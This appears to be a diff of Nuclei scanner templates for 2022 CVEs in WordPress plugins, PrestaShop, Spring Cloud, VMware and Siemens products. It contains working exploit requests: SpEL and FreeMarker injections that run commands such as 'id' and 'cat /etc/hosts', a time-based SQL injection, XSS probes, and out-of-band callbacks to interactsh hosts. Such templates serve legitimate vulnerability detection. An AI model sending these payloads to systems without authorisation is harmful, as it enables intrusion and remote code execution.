cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: + max-request: 1 + vendor: gitlab + product: gitlab shodan-query: http.title:"GitLab" tags: cve,cve2022,gitlab -requests: +http: - method: GET path: - "{{BaseURL}}/users/sign_in" @@ -69,3 +81,4 @@ requests: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' +# digest: 4b0a00483046022100b4127186492776d7641a3e74b310dc16db32c61bcc8aaf0f5eed928c30579768022100a3666fdd83770c9f2bdb11e06228e33df10080c5bea500dad29a7d9ff311b7e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2187.yaml b/nuclei-templates/CVE-2022/CVE-2022-2187.yaml new file mode 100644 index 0000000000..26f13b2649 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2187.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-2187 +info: + name: Contact Form 7 Captcha < 0.1.2 - Reflected Cross-Site Scripting + author: For3stCo1d + severity: medium + description: | + The Contact Form 7 Captcha WordPress plugin before 0.1.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers + reference: + - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d + - https://wordpress.org/plugins/contact-form-7-simple-recaptcha + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2187 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-2187 + cwe-id: CWE-79 + tags: cve,cve2022,wordpress,xss,wp-plugin,wp +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&">' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Contact Form 7" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2219.yaml b/nuclei-templates/CVE-2022/CVE-2022-2219.yaml index 4a53fdd172..e8d92c1859 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2219.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2219.yaml @@ -6,17 +6,20 @@ info: severity: high description: | The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website. remediation: Fixed in version 2.7.27 reference: - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a - https://nvd.nist.gov/vuln/detail/CVE-2022-2219 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2022-2219 cwe-id: CWE-79 - epss-score: 0.00179 - epss-percentile: 0.55082 + epss-score: 0.00159 + epss-percentile: 0.51461 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +27,7 @@ info: vendor: brizy product: unyson framework: wordpress - tags: authenticated,cve,cve2022,wordpress,wp,xss,unyson,wp-plugin,wpscan + tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "script%3Ealert%28document.domain%29%3C%2Fscript%3")' - 'contains(body_2, "Unyson")' condition: and -# digest: 4a0a004730450220188729b0aa88b8b60d4db5c0513b4b3f71bd46e028daaa0fa46010724787101a022100fdd646f727168394fb427e44b5dfd40098c0307b93e15c4c38826789c5aa275c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfcefb399374a0e1dd65cd66bf15ae4aca3a1a21386b55b3834dbf0526915376022067dfec245e79a0071cf91a2c9932e98f3027dac527f5492b772e911ecb8c28d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22242.yaml b/nuclei-templates/CVE-2022/CVE-2022-22242.yaml index c88e8381b9..0cf4e3db0a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22242.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22242.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability. reference: - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/ - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US - https://kb.juniper.net/JSA69899 - https://nvd.nist.gov/vuln/detail/CVE-2022-22242 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-22242 cwe-id: CWE-79 + epss-score: 0.41023 + epss-percentile: 0.972 + cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: juniper + product: junos shodan-query: title:"Juniper Web Device Manager" - verified: "true" - tags: cve,cve2022,xss,juniper,junos + tags: cve2022,cve,xss,juniper,junos -requests: +http: - method: GET path: - '{{BaseURL}}/error.php?SERVER_NAME=' @@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 4b0a00483046022100dd079776ea27c19753a8ad4a76e5c18c893747a661ca9102e5624558800ef324022100a443205263e77c92329409a8c948bd4c67eeffeb1aca399e376c871088778361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22733.yaml b/nuclei-templates/CVE-2022/CVE-2022-22733.yaml index 6f24d33af7..f1619bc1af 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22733.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application. remediation: | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-22733 - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6 - http://www.openwall.com/lists/oss-security/2022/01/20/2 + - https://github.com/Zeyad-Azima/CVE-2022-22733 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 - epss-score: 0.20338 - epss-percentile: 0.95849 + epss-score: 0.12656 + epss-percentile: 0.95328 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 - tags: cve,cve2023,exposure,sharingsphere,apache + tags: cve2022,cve,exposure,sharingsphere,apache http: - raw: @@ -60,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f5a32e9515e111d2ed8f73755563f3ffce1aed405dc6819c0de0f74a61cd3c5802201d8a705dbac5a90bb3535da85fd744df5825dd797e901b8d46980f912af8dc04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f6af293cbdd4986d1af6b7b77c096113f537236e7ea53a74d1723cc59ef0491f02204739dd5828b2f03b95cb3d91c20c90771e760b69a978c0572704cdc1feb82038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22897.yaml b/nuclei-templates/CVE-2022/CVE-2022-22897.yaml index 74d5221bbe..4cbf8a2d1f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22897.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22897.yaml @@ -3,33 +3,44 @@ id: CVE-2022-22897 info: name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection author: mastercho - severity: Critical + severity: critical description: | - The AP PAGEBUILDER Prestashop module <= 2.4.4 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database. + A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + remediation: | + Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22897 + - https://nvd.nist.gov/vuln/detail/CVE-2022-22897 - https://packetstormsecurity.com/files/cve/CVE-2022-22897 - - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ + - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html + - https://github.com/ARPSyndicate/cvemon + - https://github.com/karimhabush/cyberowl classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22897 cwe-id: CWE-89 - tags: cve,cve2022,prestashop,prestashop-module,sqli + epss-score: 0.04685 + epss-percentile: 0.91818 + cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 + verified: true + max-request: 2 + vendor: apollotheme + product: ap_pagebuilder + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme http: - - raw: - | - @timeout: 12s POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} + Referer: {{RootURL}} X-Requested-With: XMLHttpRequest - Connection: Keep-alive leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0) - | @@ -39,17 +50,15 @@ http: extractors: - type: regex name: version - part: body_1 + part: body_2 internal: true group: 1 regex: - "\\s*\\s*<\\/version>" - - stop-at-first-match: true - matchers-condition: or matchers: - type: dsl dsl: - 'duration_1>=6' - 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")' - condition: or \ No newline at end of file + condition: and +# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22947.yaml b/nuclei-templates/CVE-2022/CVE-2022-22947.yaml index c02886515d..4b898717eb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22947.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22947.yaml @@ -1,82 +1,67 @@ id: CVE-2022-22947 info: - name: Spring Cloud Gateway Code Injection - author: pdteam + name: CVE-2022-22947 + author: 0x240x23elu severity: critical - description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host." + description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 - - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ - - https://github.com/wdahlenburg/spring-gateway-demo - - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published - - https://tanzu.vmware.com/security/cve-2022-22947 - tags: cve,cve2022,apache,spring,vmware,actuator,oast - classification: - cve-id: CVE-2022-22947 + - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947 + tags: cve,cve2022,rce,spring requests: - raw: - | - POST /actuator/gateway/routes/{{randstr}} HTTP/1.1 + POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 + Connection: close Content-Type: application/json + Content-Length: 329 { - "predicates": [ - { - "name": "Path", - "args": { - "_genkey_0": "/{{randstr}}/**" - } + "id": "hacktest", + "filters": [{ + "name": "AddResponseHeader", + "args": { + "name": "Result", + "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } - ], - "filters": [ - { - "name": "RewritePath", - "args": { - "_genkey_0": "#{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")}", - "_genkey_1": "/${path}" - } - } - ], - "uri": "{{RootURL}}", - "order": 0 + }], + "uri": "http://example.com" } - - | + - | POST /actuator/gateway/refresh HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - - { - "predicate": "Paths: [/{{randstr}}], match trailing slash: true", - "route_id": "{{randstr}}", - "filters": [ - "[[RewritePath #{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")} = /${path}], order = 1]" - ], - "uri": "{{RootURL}}", - "order": 0 - } + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 0 - | - DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1 + GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 0 matchers-condition: and matchers: - - type: status - status: - - 201 - - type: word - part: header + part: body words: - - "/routes/{{randstr}}" - - - type: word - part: interactsh_protocol - words: - - "dns" - -# Enhanced by mp on 2022/03/08 + - "udi=0" + - "(root)" + - "groups" + - "hacktest" \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22954.yaml b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml index 65bc52e109..02d131fa6e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22954.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml @@ -1,32 +1,48 @@ id: CVE-2022-22954 info: - name: VMware Workspace ONE Access - Freemarker SSTI + name: VMware Workspace ONE Access - Server-Side Template Injection author: sherlocksecurity severity: critical - description: An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw. + description: | + VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 + - https://www.vmware.com/security/advisories/VMSA-2022-0011.html + - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22954 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22954 - cwe-id: CWE-22 + cwe-id: CWE-94 + epss-score: 0.97348 + epss-percentile: 0.99878 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: vmware + product: identity_manager shodan-query: http.favicon.hash:-1250474341 - tags: cve,cve2022,vmware,ssti,workspaceone + tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti -requests: +http: - method: GET path: - - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d" # Executes cat /etc/hosts + - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d" matchers-condition: and matchers: - type: word + part: body words: - "Authorization context is not valid" - type: status status: - - 400 \ No newline at end of file + - 400 +# digest: 4a0a00473045022100d526962a39ddb96c782fb1b73127f860969e804b9df4fb0e992d34f58b0f8a970220594f3e21afff5d99b6ea0023e8d7fd5b96f238f8b48d7c5de5b4269733b91906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22963.yaml b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml new file mode 100644 index 0000000000..39a36176e1 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-22963 + +info: + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser + severity: critical + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94,CWE-917 + epss-score: 0.97537 + epss-percentile: 0.99993 + cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: vmware + product: spring_cloud_function + tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware + +http: + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - type: status + status: + - 500 +# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml b/nuclei-templates/CVE-2022/CVE-2022-22972.yaml deleted file mode 100644 index dc44fa1296..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml +++ /dev/null @@ -1,106 +0,0 @@ -id: CVE-2022-22972 - -info: - name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass - author: For3stCo1d,princechaddha - severity: critical - description: | - VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. - reference: - - https://github.com/horizon3ai/CVE-2022-22972 - - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22972 - cwe-id: CWE-287 - metadata: - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - tags: cve,cve2022,vmware,auth-bypass,oast - -requests: - - raw: - - | - GET /vcac/ HTTP/1.1 - Host: {{Hostname}} - - - | - GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 - Host: {{Hostname}} - - - | - POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 - Host: {{interactsh-url}} - Content-type: application/x-www-form-urlencoded - - protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - - host-redirects: true - max-redirects: 3 - cookie-reuse: true - extractors: - - type: regex - part: body - name: protected_state - group: 1 - regex: - - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' - internal: true - - - type: regex - part: body - name: horizonRelayState - group: 1 - regex: - - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' - internal: true - - - type: regex - part: body - name: userstore - group: 1 - regex: - - 'id="userstore" value="([a-z.]+)" \/>' - internal: true - - - type: regex - part: body - name: userstoreDisplay - group: 1 - regex: - - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' - internal: true - - - type: regex - part: body - name: stickyConnectorId - group: 1 - regex: - - 'name="stickyConnectorId" value="(.*)"/>' - internal: true - - - type: kval - part: header - name: HZN-Cookie - kval: - - 'HZN' - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "HZN=" - - - type: status - status: - - 302 - - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23102.yaml b/nuclei-templates/CVE-2022/CVE-2022-23102.yaml index 066a97a54e..2ca0d8a91c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23102.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23102.yaml @@ -1,33 +1,62 @@ id: CVE-2022-23102 + info: name: SINEMA Remote Connect Server < V2.0 - Open Redirect - author: ctflearner + author: ctflearner,ritikchaddha severity: medium description: | - A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. + A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. + remediation: | + Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/cve-2022-23102 - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html - https://seclists.org/fulldisclosure/2022/Feb/20 - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23102 cwe-id: CWE-601 + epss-score: 0.00366 + epss-percentile: 0.71925 cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 + vendor: siemens + product: sinema_remote_connect_server shodan-query: title:"Logon - SINEMA Remote Connect" - tags: cve,cve2022,redirect,sinema + tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens http: - - method: GET - path: - - "{{BaseURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh" + - raw: + - | + GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1 + Host: {{Hostname}} + - | + POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: csrftoken={{csrf}}; + Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh + + csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}} matchers: - type: regex - part: header + part: header_2 regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - "name='csrfmiddlewaretoken' value='(.*)' />" + internal: true +# digest: 490a0046304402203cad78aaff543175f5e30153ca01cb6d6a88448ec822dc9559ed8b13434d6e9c022002833237d916abd0bcc7d2263671711bfe6b01b5fdaf5564e962070a75d71045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2314.yaml b/nuclei-templates/CVE-2022/CVE-2022-2314.yaml index 83a7fe1900..04b41916be 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2314.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2314.yaml @@ -1,34 +1,45 @@ id: CVE-2022-2314 info: - name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call + name: WordPress VR Calendar <=2.3.2 - Remote Code Execution author: theamanrawat severity: critical description: | - The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site. + WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. + remediation: | + Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82 - https://wordpress.org/plugins/vr-calendar-sync/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2314 + cwe-id: CWE-78,NVD-CWE-noinfo + epss-score: 0.26874 + epss-percentile: 0.96341 + cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin + verified: true + max-request: 2 + vendor: vr_calendar_project + product: vr_calendar + framework: wordpress + tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project -requests: +http: - raw: - | GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers-condition: and matchers: - type: word @@ -46,3 +57,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402206692348e2633018a23d148415e047563294843e45c7b5ee7d28a232472ccfa8a0220754a5291e01ce0d4ea4c998c533782d53abed0b92402761dd3c6984b8e34ac71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23348.yaml 